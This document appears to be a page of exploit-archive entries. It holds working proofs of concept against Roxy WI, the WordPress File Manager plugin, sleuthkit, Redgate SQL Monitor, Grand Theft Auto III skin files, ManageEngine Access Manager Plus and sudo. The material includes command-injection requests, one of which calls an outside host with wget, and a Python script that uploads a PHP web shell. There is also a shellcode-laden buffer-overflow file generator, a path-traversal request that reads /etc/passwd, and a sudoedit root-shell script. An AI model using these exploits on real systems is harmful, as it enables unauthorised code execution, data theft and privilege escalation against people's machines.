<pre><code># ADVISORY INFORMATION<br /># Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload<br /># Date of found: 21 July 2022<br /># Application: Roxy WI &lt;&#61; v6.1.1.0<br /># Author: Nuri Çilengir <br /># Vendor Homepage: https://roxy-wi.org<br /># Software Link: https://github.com/hap-wi/roxy-wi.git<br /># Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137<br /># Tested on: Ubuntu 22.04<br /># CVE : CVE-2022-31161<br /><br /><br /># PoC<br />POST /app/options.py HTTP/1.1<br />Host: 192.168.56.116<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0<br />Accept: &#42;/&#42;<br />Accept-Language: en-US,en;q&#61;0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset&#61;UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 123<br />Origin: https://192.168.56.116<br />Referer: https://192.168.56.116/app/login.py<br />Connection: close<br /><br />show_versions&#61;1&amp;token&#61;&amp;alert_consumer&#61;notNull&amp;serv&#61;127.0.0.1&amp;delcert&#61;a%20&amp;%20wget%20&lt;id&gt;.oastify.com;<br /><br /></code></pre>

<pre><code># ADVISORY INFORMATION<br /># Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)<br /># Date of found: 21 July 2022<br /># Application: Roxy WI &lt;&#61; v6.1.0.0<br /># Author: Nuri Çilengir <br /># Vendor Homepage: https://roxy-wi.org<br /># Software Link: https://github.com/hap-wi/roxy-wi.git<br /># Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137<br /># Tested on: Ubuntu 22.04<br /># CVE : CVE-2022-31126<br /><br /><br /># PoC<br />POST /app/options.py HTTP/1.1<br />Host: 192.168.56.116<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0<br />Accept: &#42;/&#42;<br />Accept-Language: en-US,en;q&#61;0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset&#61;UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 73<br />Origin: https://192.168.56.116<br />Referer: https://192.168.56.116/app/login.py<br />Connection: close<br /><br />show_versions&#61;1&amp;token&#61;&amp;alert_consumer&#61;1&amp;serv&#61;127.0.0.1&amp;getcert&#61;;id;<br /><br /></code></pre>

<pre><code>#!/usr/bin/env<br /><br /># Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE<br /># Date: &#91; 22-01-2023 &#93;<br /># Exploit Author: &#91;BLY&#93;<br /># Vendor Homepage: &#91;https://wpscan.com/vulnerability/10389&#93;<br /># Version: &#91; File Manager plugin 6.0-6.9&#93;<br /># Tested on: &#91; Debian &#93;<br /># CVE : &#91; CVE-2020-25213 &#93;<br /><br />import sys,signal,time,requests<br />from bs4 import BeautifulSoup<br />#from pprint import pprint<br /><br />def handler(sig,frame):<br /> print (&quot;&#91;!&#93;Saliendo&quot;)<br /> sys.exit(1)<br /><br />signal.signal(signal.SIGINT,handler)<br /><br />def commandexec(command):<br /><br /> exec_url &#61; url+&quot;/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php&quot;<br /> params &#61; &#123;<br /> &quot;cmd&quot;:command<br /> &#125;<br /><br /> r&#61;requests.get(exec_url,params&#61;params)<br /><br /> soup &#61; BeautifulSoup(r.text, &#39;html.parser&#39;)<br /> text &#61; soup.get_text()<br /><br /> print (text)<br />def exploit():<br /><br /> global url<br /><br /> url &#61; sys.argv&#91;1&#93;<br /> command &#61; sys.argv&#91;2&#93;<br /> upload_url &#61; url+&quot;/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php&quot;<br /><br /> headers &#61; &#123;<br /> &#39;content-type&#39;: &quot;multipart/form-data; boundary&#61;----WebKitFormBoundaryvToPIGAB0m9SB1Ww&quot;,<br /> &#39;Connection&#39;: &quot;close&quot; <br /> &#125;<br /><br /> payload &#61; &quot;------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name&#61;\&quot;cmd\&quot;\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name&#61;\&quot;target\&quot;\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name&#61;\&quot;upload&#91;&#93;\&quot;; filename&#61;\&quot;shell.php\&quot;\r\nContent-Type: application/x-php\r\n\r\n&lt;?php echo \&quot;&lt;pre&gt;\&quot; . shell_exec(&#36;_REQUEST&#91;&#39;cmd&#39;&#93;) . \&quot;&lt;/pre&gt;\&quot;; ?&gt;\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--&quot;<br /><br /> try:<br /> r&#61;requests.post(upload_url,data&#61;payload,headers&#61;headers)<br /> #pprint(r.json())<br /> commandexec(command)<br /> except:<br /> print(&quot;&#91;!&#93; Algo ha salido mal...&quot;)<br /><br /><br /><br /><br />def help():<br /><br /> print (&quot;\n&#91;&#42;&#93; Uso: python3&quot;,sys.argv&#91;0&#93;,&quot;\&quot;url\&quot; \&quot;comando\&quot;&quot;)<br /> print (&quot;&#91;!&#93; Ejemplo: python3&quot;,sys.argv&#91;0&#93;,&quot;http://wordpress.local/ id&quot;)<br /><br /><br /><br /><br />if __name__ &#61;&#61; &#39;__main__&#39;:<br /><br /> if len(sys.argv) !&#61; 3:<br /> help()<br /><br /> else:<br /> exploit()<br /> <br /><br /></code></pre>

<pre><code># Exploit Title: sleuthkit 4.11.1 - Command Injection <br /> # Date: 2023-01-20<br /># CVE-2022-45639<br /># Vendor Homepage: https://github.com/sleuthkit<br /># Vulnerability Type: Command injection<br /># Attack Type: Local<br /># Version: 4.11.1<br /># Exploit Author: Dino Barlattani, Giuseppe Granato<br /># Link poc: https://www.binaryworld.it/guidepoc.asp#CVE-2022-45639<br /># POC:<br /><br />fls tool is affected by command injection in parameter &quot;-m&quot; when run on<br />linux system.<br />OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows<br />attackers to execute arbitrary commands<br />via a crafted value to the m parameter<br /><br />when it run on linux, a user can insert in the -m parameter a buffer with<br />backtick with a shell command.<br />If it run with a web application as front end it can execute commands on<br />the remote server.<br /><br />The function affected by the vulnerability is &quot;tsk_fs_fls()&quot; from the<br />&quot;fls_lib.c&quot; file<br /><br />#ifdef TSK_WIN32<br /> &#123;<br /> ....<br /> &#125;<br />#else<br /><br /> data.macpre &#61; tpre; &lt;---------------<br /><br /> return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &amp;data);<br /><br />#endif<br /><br />Run command:<br /><br />&#36; fls -m &#96;id&#96; &#91;Options&#93;<br /><br /><br />-- <br />&#42;Dino Barlattani&#42;<br />www.linkedin.com/in/dino-barlattani-10bba11a9/<br />www.binaryworld.it &lt;http://Binaryworld.it&gt;<br />www.youtube.com/user/dinbar78<br /><br /></code></pre>

<pre><code># Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control<br /># Date of found: 21 July 2022<br /># Application: Roxy WI &lt;&#61; v6.1.0.0<br /># Author: Nuri Çilengir<br /># Vendor Homepage: https://roxy-wi.org<br /># Software Link: https://github.com/hap-wi/roxy-wi.git<br /># Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137<br /># Tested on: Ubuntu 22.04<br /># CVE : CVE-2022-31125<br /><br /><br /># PoC<br />POST /app/options.py HTTP/1.1<br />Host: 192.168.56.116<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0<br />Accept: &#42;/&#42;<br />Accept-Language: en-US,en;q&#61;0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset&#61;UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 105<br />Origin: https://192.168.56.114<br />Dnt: 1<br />Referer: https://192.168.56.114/app/login.py<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />alert_consumer&#61;notNull&amp;serv&#61;roxy-wi.access.log&amp;rows1&#61;10&amp;grep&#61;&amp;exgrep&#61;&amp;hour&#61;00&amp;minut&#61;00&amp;hour1&#61;23&amp;minut1&#61;45<br /> <br /></code></pre>

<pre><code># Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) <br /># Date: &#91;12/21/2022 02:07:23 AM UTC&#93;<br /># Exploit Author: &#91;geeklinuxman&#64;gmail.com&#93;<br /># Vendor Homepage: &#91;https://www.red-gate.com/&#93;<br /># Software Link: &#91;https://www.red-gate.com/products/dba/sql-monitor/&#93;<br /># Version: &#91;SQL Monitor 12.1.31.893&#93;<br /># Tested on: &#91;Windows OS&#93;<br /># CVE : &#91;CVE-2022-47870&#93;<br /><br /> &#91;Description&#93;<br /> Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate<br /> SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web<br /> Script or HTML via the returnUrl parameter.<br /><br /> &#91;Affected Component&#93; affected returnUrl in<br />https://sqlmonitor.&#42;.com/Account/Login?returnUrl&#61;&amp;hasAttemptedCookie&#61;True<br /> affected A tag under span with &quot;redirect-timeout&quot; id value<br /><br /> &#91;CVE Impact&#93;<br /> disclosure of the user&#39;s session cookie, allowing an attacker to<br />hijack the user&#39;s session and take over the account.<br /><br /> &#91;Attack Vectors&#93;<br /> to exploit the vulnerability, someone must click on the malicious A<br />HTML tag under span with &quot;redirect-timeout&quot; id value<br /><br /> &#91;Vendor&#93;<br /> http://redgate.com<br /> http://sqlmonitor.com<br /> https://sqlmonitor.<br /><br /></code></pre>

<pre><code># Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow <br /># Exploit Date: 22.01.2023<br /># Discovered and Written by: Knursoft<br /># Vendor Homepage: https://www.rockstargames.com/<br /># Version: v1.1<br /># Tested on: Windows XP SP2/SP3, 7, 10 21H2<br /># CVE : N/A<br /><br />#1 - Run this python script to generate &quot;evil.bmp&quot; file.<br />#2 - Copy it to &#91;Your Game Path&#93;\skins.<br />#3 - Launch the game and navigate to Options &gt; Player Setup and choose skin<br />&quot;evil&quot;.<br />#4 - Buffer Overflow occurs and calc.exe pops up!<br /><br />#msfvenom -p windows/exec CMD&#61;&quot;calc.exe&quot;<br />buf &#61; b&quot;&quot;<br />buf +&#61; b&quot;\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64&quot;<br />buf +&#61; b&quot;\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28&quot;<br />buf +&#61; b&quot;\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c&quot;<br />buf +&#61; b&quot;\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52&quot;<br />buf +&#61; b&quot;\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1&quot;<br />buf +&#61; b&quot;\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49&quot;<br />buf +&#61; b&quot;\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01&quot;<br />buf +&#61; b&quot;\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75&quot;<br />buf +&#61; b&quot;\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b&quot;<br />buf +&#61; b&quot;\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24&quot;<br />buf +&#61; b&quot;\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a&quot;<br />buf +&#61; b&quot;\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00&quot;<br />buf +&#61; b&quot;\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5&quot;<br />buf +&#61; b&quot;\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c&quot;<br />buf +&#61; b&quot;\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a&quot;<br />buf +&#61; b&quot;\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65&quot;<br />buf +&#61; b&quot;\x00&quot;<br />#any shellcode should work, as it seems there is no badchars<br /><br />ver &#61; 0 #set to 1 if you want it to work on GTA III steam version<br /><br />esp &#61; b&quot;\xb9\xc5\x14\x21&quot; #mss32.dll jmp esp<br />bmphdr &#61;<br />b&quot;\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00&quot;<br />#generic bmp header<br /><br />payload &#61; bmphdr<br />payload +&#61; b&quot;\x90&quot; &#42; 1026<br />if ver &#61;&#61; 1:<br /> payload +&#61; b&quot;\x90&quot; &#42; 112<br />payload +&#61; esp<br />payload +&#61; b&quot;\x90&quot; &#42; 20 #padding<br />payload +&#61; buf<br /><br />with open(&quot;evil.bmp&quot;, &quot;wb&quot;) as poc:<br /> poc.write(payload)<br /> <br /><br /></code></pre>

<pre><code>## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal<br />## Author: nu11secur1ty<br />## Date: 11.22.2023<br />## Vendor: https://www.manageengine.com/<br />## Software: https://www.manageengine.com/privileged-session-management/download.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)<br /><br />## Description:<br />The &#96;pmpcc&#96; cookie is vulnerable to path traversal attacks, enabling<br />read access to arbitrary files on the server.<br />The testing payload<br />..././..././..././..././..././..././..././..././..././..././etc/passwd<br />was submitted in the pmpcc cookie.<br />The requested file was returned in the application&#39;s response.<br />The attacker easy can see all the JS structures of the server and can<br />perform very dangerous actions.<br /><br />## STATUS: HIGH Vulnerability<br /><br />&#91;+&#93; Exploits:<br />&#96;&#96;&#96;GET<br />GET /amp/webapi/?requestType&#61;GET_AMP_JS_VALUES HTTP/1.1<br />Host: localhost:9292<br />Accept-Encoding: gzip, deflate<br />Accept: &#42;/&#42;<br />Accept-Language: en-US;q&#61;0.9,en;q&#61;0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age&#61;0<br />Cookie: pmpcc&#61;...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;<br />_zcsr_tmp&#61;41143b42-8ff3-4fb0-8b30-688f63f9bf9a;<br />JSESSIONID&#61;2D2DB63E708680CBC717A8A165CE1D6E;<br />JSESSIONIDSSO&#61;314212F36F55D2CE1E7A76F98800E194<br />Sec-CH-UA: &quot;.Not/A)Brand&quot;;v&#61;&quot;99&quot;, &quot;Google Chrome&quot;;v&#61;&quot;107&quot;, &quot;Chromium&quot;;v&#61;&quot;107&quot;<br />Sec-CH-UA-Mobile: ?0<br />X-Requested-With: XMLHttpRequest<br />Sec-CH-UA-Platform: Windows<br />Referer: https://localhost:9292/AMPHome.html<br />&#96;&#96;&#96;<br /><br />&#91;+&#93; Response:<br /><br />&#96;&#96;&#96;<br />,&#39;js.pmp.helpCertRequest.subcontent10&#39;:&#39;The issued certificate is<br />e-mailed to the user who raises the request, the user who closes the<br />request and also to those e-mail ids specified at the time of closing<br />the request.&#39;<br />,&#39;js.admin.HelpDeskIntegrate.UsernameEgServiceNow&#39;:&#39;ServiceNow login username&#39;<br />,&#39;js.PassTrixMainTab.ActiveDirectory.next_schedule_time&#39;:&#39;Next<br />synchronization is scheduled to run on&#39;<br />,&#39;js.agent.csharp_Windows_Agent&#39;:&#39;C# Windows Agent&#39;<br />,&#39;js.PassTrixMainTab.in_sec&#39;:&#39;Seconds&#39;<br />,&#39;godaddy.importcsr.selectfileorpastecontent&#39;:&#39;Either select a file or<br />paste the CSR content.&#39;<br />,&#39;js.connection.colors&#39;:&#39;Colors&#39;<br />,&#39;js.general.ShareToGroups&#39;:&#39;Share resource to user groups&#39;<br />,&#39;js.connection.mapdisk&#39;:&#39;Drives&#39;<br />,&#39;jsp.admin.Support.User_Forums&#39;:&#39;User Forums&#39;<br />,&#39;js.general.CreateResource.Dns_url_check&#39;:&#39;Enter a valid URL . For<br />cloud services (Rackspace and AWS IAM), the DNS name &lt;br&gt;looks like a<br />URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)&#39;<br />,&#39;js.admin.RPA_Integration.About&#39;:&#39;PAM360 renders bots that seamlessly<br />integrate and perfectly fit into the pre-designed and automated<br />integrations of the below listed RPA-powered platforms, to simulate<br />the routine manual password retrieval from the PAM360 vault.&#39;<br />,&#39;js.discovery.loadhostnamefromfile&#39;:&#39;From file&#39;<br />,&#39;js.AddListenerDetails.Please_enter_valid_implementation_class&#39;:&#39;Please<br />enter a valid Implementation Class&#39;<br />,&#39;js.general.GroupedResources&#39;:&#39;Grouped Resources&#39;<br />,&#39;js.general.SlaveServer&#39;:&#39;This operation is not permitted in Secondary Server.&#39;<br />,&#39;PROCESSID&#39;:&#39;Process Id&#39;<br />,&#39;js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully&#39;:&#39;Services<br />fetched successfully&#39;<br />,&#39;assign.defaultdns.nodnsconfigured&#39;:&#39;No default DNS available\/enabled&#39;<br />,&#39;js.commonstr.search&#39;:&#39;Search&#39;<br />,&#39;js.discovery.usercredential_type&#39;:&#39;Credential Type&#39;<br />,&#39;jsp.admin.GeneralSetting.Check_high_availability_status_for&#39;:&#39;Check<br />high availability status every &lt;input type&#61;\&quot;text\&quot; class&#61;\&quot;txtbox\&quot;<br />name&#61;\&quot;check_duration\&quot; value&#61;\&quot;&#123;0&#125;\&quot; size&#61;\&quot;5\&quot; maxlength&#61;\&quot;5\&quot;<br />style&#61;\&quot;width:60px\&quot; onkeypress&#61;\&quot;if(event.keyCode&#61;&#61;13)return false;\&quot;<br />&gt; minutes.&#39;<br />,&#39;pki.js.help.entervalidnumber&#39;:&#39;Please enter a valid number for<br />Numeric Field Default Value.&#39;<br />,&#39;js.remoteapp.fetch&#39;:&#39;Fetch&#39;<br />,&#39;js.admin.HighAvailability.configured_successfully&#39;:&#39;Configured Successfully&#39;<br />,&#39;js.generalSettings_searchTerm_Password_reset&#39;:&#39;Password Reset,<br />Reason for password reset, disable ticket id, waiting time, wait time<br />for service account password reset, linux unix password reset&#39;<br />,&#39;letsencrypt.enter.domainnames&#39;:&#39;Enter domain names&#39;<br />,&#39;js.discovery.resourcetype&#39;:&#39;Resource Type&#39;<br />,&#39;js.HomeTab.UserTab&#39;:&#39;Set this tab as default view for \&#39;Users\&#39;&#39;<br />,&#39;js.report.timeline.todate&#39;:&#39;Valid To&#39;<br />,&#39;js.general_Language_Changed_Successfully&#39;:&#39;Language Changed Successfully&#39;<br />,&#39;js.aws.credentials.label&#39;:&#39;AWS Credential&#39;<br />,&#39;auditpurge.helpnote1&#39;:&#39;Enter 0 or leave the field blank to disable<br />purging of audit trails.&#39;<br />,&#39;js.general.user.orgn_bulkManage&#39;:&#39;Manage Organization&#39;<br />,&#39;js.rolename.SSH_KEY&#39;:&#39;Create\/Add key&#39;<br />,&#39;js.admin.admin.singledbmultiserver.name&#39;:&#39;Application Scaling&#39;<br />,&#39;lets.encrypt.requestreport&#39;:&#39;Let\&#39;s Encrypt Requests Report&#39;<br />,&#39;js.settings.breach_settings.disable_api&#39;:&#39;Disable API Access&#39;<br />,&#39;js.cmd.delete.not_possible&#39;:&#39;Command cannot be deleted as it is<br />already added to the following command set(s).&#39;<br />,&#39;js.settings.notification.domaincontent&#39;:&#39;Notify if domains are<br />expiring within&#39;<br />,&#39;js.aws.searchuser&#39;:&#39;--Search UserName--&#39;<br />,&#39;jsp.admin.GeneralSetting.helpdesk_conf&#39;:&#39;Configure the ticketing<br />system settings in Admin &gt;&gt; General &gt;&gt; Ticketing System Integration.&#39;<br />,&#39;js.discovery.port&#39;:&#39;Gateway Port&#39;<br />,&#39;usermanagement.showCertificates&#39;:&#39;Show Certificates&#39;<br />,&#39;js.general.DestinationDirectoryCannotBeEmpty&#39;:&#39;Destination directory<br />cannot be empty&#39;<br />,&#39;js.sshreport.title&#39;:&#39;SSH Resource Report&#39;<br />,&#39;js.encryptionkey.update&#39;:&#39;Update&#39;<br />,&#39;js.aws.regions&#39;:&#39;Region&#39;<br />,&#39;js.settingsTitle1.UserManagement&#39;:&#39;User Management&#39;<br />,&#39;js.passwordPolicy.setRange&#39;:&#39;Enforce minimum or maximum password length&#39;<br />,&#39;js.commonstr.selectResources&#39;:&#39;Select Resources&#39;<br />,&#39;RULENAME&#39;:&#39;Rule Name&#39;<br />,&#39;jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully&#39;:&#39;User<br />Group added successfully&#39;<br />,&#39;js.reports.SSHReports.title&#39;:&#39;SSH Reports&#39;<br />,&#39;js.CommonStr.ValueIsLess&#39;:&#39;value is less than 2&#39;<br />,&#39;js.discovery.discoverystatus&#39;:&#39;Discovery Status&#39;<br />,&#39;js.settings.security_settings.Web_Access&#39;:&#39;Web Access&#39;<br />,&#39;js.general.node_name_cannot_be_empty&#39;:&#39;Node name cannot be empty&#39;<br />,&#39;js.deploy.audit&#39;:&#39;Deploy Audit&#39;<br />,&#39;js.agentdiscovery.msca.title&#39;:&#39;Microsoft Certificate Authority&#39;<br />,&#39;jsp.resources.AccessControlView.Choose_the_excluded_groups&#39;:&#39;Nominate<br />user group(s) to exempt from access control.&#39;<br />,&#39;js.pki.SelectCertificateGroup&#39;:&#39;Select Certificate Group(s)&#39;<br />,&#39;js.admin.HighAvailability.High_Availability_status&#39;:&#39;Status&#39;<br />,&#39;settings.metracker.note0&#39;:&#39;Disable ME Tracker if you do not wish to<br />allow ManageEngine to collect product usage details.&#39;<br />,&#39;SERVICENAME&#39;:&#39;Service Name&#39;<br />,&#39;settings.metracker.note1&#39;:&#39;Access Manager Plus server has to be<br />restarted for the changes to take effect.&#39;<br />,&#39;js.general.NewPinMismatch&#39;:&#39;New PIN Mismatch&#39;<br />,&#39;js.HomeTab.ResourceTab&#39;:&#39;Set this tab as default view for \&#39;Resources\&#39;&#39;<br />,&#39;java.ScheduleUtil.minutes&#39;:&#39;minutes&#39;<br />,&#39;js.admin.sdpop_change.tooltip&#39;:&#39;Enabling this option will require<br />your users to provide valid Change IDs for the validation of password<br />access requests and other similar operations. Leaving this option<br />unchecked requires the users to submit valid Request IDs for<br />validation.&#39;<br />,&#39;js.privacy_settings.title.redact&#39;:&#39;Redact&#39;<br />,&#39;js.admin.passwordrequests.Target_Resource_Selection_Alert&#39;:&#39;Only 25<br />resources can be selected&#39;<br />,&#39;js.aboutpage.websitetitle&#39;:&#39;Website&#39;<br />,&#39;js.customize.NumericField&#39;:&#39;Numeric Field&#39;<br />,&#39;js.please.select.file&#39;:&#39;Please select a file to upload.&#39;<br />,&#39;js.AutoLogon.Remote_connections&#39;:&#39;Remote Connections&#39;<br />,&#39;pki.snmp.port&#39;:&#39;Port&#39;<br />,&#39;java.dashboardutils.TODAY&#39;:&#39;TODAY&#39;<br />,&#39;js.schedule.starttime&#39;:&#39;Start Time&#39;<br />,&#39;js.ssh.keypassphrase&#39;:&#39;Passphrase&#39;<br />,&#39;js.gettingstarted.keystore.step1.one&#39;:&#39;Add keys to Access Manager Plus&#39;<br />,&#39;js.analytics.tab.ueba.msg4&#39;:&#39;guide&#39;<br />,&#39;js.analytics.tab.ueba.msg5&#39;:&#39;to complete the integration. For any<br />further questions, please write to us at<br />pam360-support&#64;manageengine.com.&#39;<br />,&#39;js.reportType.Option7.UserAuditReport&#39;:&#39;Audit Report&#39;<br />,&#39;js.common.csr&#39;:&#39;CSR&#39;<br />,&#39;js.globalsign.reissue.order&#39;:&#39;Reissue Order&#39;<br />,&#39;js.analytics.tab.ueba.msg6&#39;:&#39;Build a platform of expected behavior<br />for individual users and entities by mapping different user accounts&#39;<br />,&#39;js.analytics.tab.ueba.msg7&#39;:&#39;Verify actionable reports that<br />symbolize compromise with details about actual behavior and expected<br />behavior.&#39;<br />,&#39;js.resources.importcredential&#39;:&#39;Import Credentials&#39;<br />,&#39;js.analytics.tab.ueba.msg1&#39;:&#39;The Advanced Analytics module for<br />PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from<br />different sources, including firewalls, routers, workstations,<br />databases, file servers and cloud services. Any deviation from normal<br />behavior is classified as a time, count, or pattern anomaly. It then<br />gives actionable insight to the IT Administrator with the use of risk<br />scores, anomaly trends, and intuitive reports.&#39;<br />,&#39;js.analytics.tab.ueba.msg2&#39;:&#39;With Log360 UEBA analytics, you can:&#39;<br />,&#39;js.analytics.tab.ueba.msg3&#39;:&#39;To activate Log360 UEBA for your PAM360<br />instance, download Log360 UEBA from the below link and follow the<br />instructions in this&#39;<br />,&#39;js.settingsTitle2.MailServer&#39;:&#39;Mail Server&#39;<br />,&#39;jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key&#39;:&#39;Managing<br />AMP Encryption Key&#39;<br />,&#39;settings.unmappedmails.email&#39;:&#39;E-mail Address&#39;<br />,&#39;amp.connection.connection_type&#39;:&#39;Connection Type&#39;<br />,&#39;js.analytics.tab.ueba.msg8&#39;:&#39;Diagnose anomalous user behavior based<br />on activity time, count, and pattern.&#39;<br />,&#39;godaddy.contactphone&#39;:&#39;Contact Phone&#39;<br />,&#39;js.general.HelpDeskIntegrate.ClassSameException&#39;:&#39;Class name already<br />implemented. Implement with some other class.&#39;<br />,&#39;js.analytics.tab.ueba.msg9&#39;:&#39;Track abnormal entity behaviors in<br />Windows devices, SQL servers, FTP servers, and network devices such as<br />routers, firewalls, and switches.&#39;<br />,&#39;js.rolename.freeCA.acme&#39;:&#39;ACME&#39;<br />,&#39;digicert.label.dcv.cname&#39;:&#39;CNAME Token&#39;<br />,&#39;js.helpcontent.createuser&#39;:&#39;User Creation &#39;<br />,&#39;pgpkeys.key.details&#39;:&#39;Key Information&#39;<br />,&#39;js.resources.discovery.ResourceDiscoveryStatus.discovery&#39;:&#39;Discovery Status&#39;<br />,&#39;js.HomeTab.TaskAuditView&#39;:&#39;Task Audit&#39;<br />,&#39;pki.js.certs.certGroupsSharedByUserGroups&#39;:&#39;Certificate Groups<br />Shared With User Group(s)&#39;<br />,&#39;js.common.importcsr.format&#39;:&#39;(File format should be .csr)&#39;<br />,&#39;js.notificationpolicy.Submit&#39;:&#39;Save&#39;<br />,&#39;pmp.vct.User_Audit_Configuration&#39;:&#39;User Audit Configuration&#39;<br />...<br />...<br />...<br />&#96;&#96;&#96;<br /><br />## Reproduce:<br />&#91;href&#93;(https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))<br /><br />## Reference:<br />&#91;href&#93;(https://portswigger.net/kb/issues/00100300_file-path-traversal)<br /><br />## Proof and Exploit:<br />&#91;href&#93;(https://streamable.com/scdzsb)<br /><br />## Time spent<br />&#96;03:00:00&#96;<br /><br /></code></pre>

<pre><code>#!/usr/bin/env bash<br /><br /># Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation<br /># Exploit Author: n3m1.sys<br /># CVE: CVE-2023-22809<br /># Date: 2023/01/21<br /># Vendor Homepage: https://www.sudo.ws/<br /># Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz<br /># Version: 1.8.0 to 1.9.12p1<br /># Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9<br />#<br /># Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc<br />#<br /># Running this exploit on a vulnerable system allows a localiattacker to gain <br /># a root shell on the machine.<br />#<br /># The exploit checks if the current user has privileges to run sudoedit or <br /># sudo -e on a file as root. If so it will open the sudoers file for the<br /># attacker to add a line to gain privileges on all the files and get a root <br /># shell.<br /><br />if ! sudo --version &#124; head -1 &#124; grep -qE &#39;(1\.8.&#42;&#124;1\.9\.&#91;0-9&#93;1?(p&#91;1-3&#93;)?&#124;1\.9\.12p1)&#36;&#39;<br />then<br /> echo &quot;&gt; Currently installed sudo version is not vulnerable&quot;<br /> exit 1<br />fi<br /><br />EXPLOITABLE&#61;&#36;(sudo -l &#124; grep -E &quot;sudoedit&#124;sudo -e&quot; &#124; grep -E &#39;\(root\)&#124;\(ALL\)&#124;\(ALL : ALL\)&#39; &#124; cut -d &#39;)&#39; -f 2-)<br /><br />if &#91; -z &quot;&#36;EXPLOITABLE&quot; &#93;; then<br /> echo &quot;&gt; It doesn&#39;t seem that this user can run sudoedit as root&quot;<br /> read -p &quot;Do you want to proceed anyway? (y/N): &quot; confirm &amp;&amp; &#91;&#91; &#36;confirm &#61;&#61; &#91;yY&#93; &#93;&#93; &#124;&#124; exit 2<br />else<br /> echo &quot;&gt; BINGO! User exploitable&quot;<br /> echo &quot;&gt; Opening sudoers file, please add the following line to the file in order to do the privesc:&quot;<br /> echo &quot;&#36;( whoami ) ALL&#61;(ALL:ALL) ALL&quot;<br /> read -n 1 -s -r -p &quot;Press any key to continue...&quot;<br /> EDITOR&#61;&quot;vim -- /etc/sudoers&quot; &#36;EXPLOITABLE<br /> sudo su root<br /> exit 0<br />fi<br /><br /></code></pre>
